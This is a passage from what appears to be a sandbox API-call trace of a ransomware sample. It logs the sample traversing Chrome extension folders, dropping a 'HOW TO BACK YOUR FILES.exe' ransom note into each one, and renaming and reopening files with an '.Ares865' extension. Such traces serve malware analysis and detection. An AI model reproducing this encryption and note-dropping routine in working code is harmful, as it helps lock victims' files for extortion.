"c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.817] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf" [0102.817] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf" [0102.817] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.817] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.818] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.818] GetLastError () returned 0x0 [0102.819] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x819d0bd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec71bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec71bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.819] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.819] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.819] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0" [0102.819] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0" [0102.819] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.819] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.820] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.820] GetLastError () returned 0x0 [0102.820] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec97d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec97d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.820] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.820] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.821] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.Ares865") returned 143 [0102.821] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.ares865"), dwFlags=0x1) returned 1 [0102.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.822] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6707) returned 1 [0102.825] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.Ares865") returned 149 [0102.825] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0102.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1004) returned 1 [0102.830] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata" [0102.830] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata" [0102.830] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.830] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.831] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.831] GetLastError () returned 0x0 [0102.831] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x87015b30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec97d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec97d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.831] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.831] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.Ares865") returned 168 [0102.832] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0102.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11221) returned 1 [0102.841] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales" [0102.841] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales" [0102.841] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.841] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.842] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.842] GetLastError () returned 0x0 [0102.842] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.842] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ec97d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ec97d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.843] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.843] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.843] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW" [0102.843] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW" [0102.843] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.843] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.844] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.844] GetLastError () returned 0x0 [0102.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ecbde80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ecbde80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.844] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.844] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.845] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.Ares865") returned 164 [0102.845] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=267) returned 1 [0102.850] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN" [0102.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN" [0102.850] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.850] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.851] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.851] GetLastError () returned 0x0 [0102.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.851] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fef9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ecbde80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ecbde80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.852] lstrcmpiW (lpString1=".", 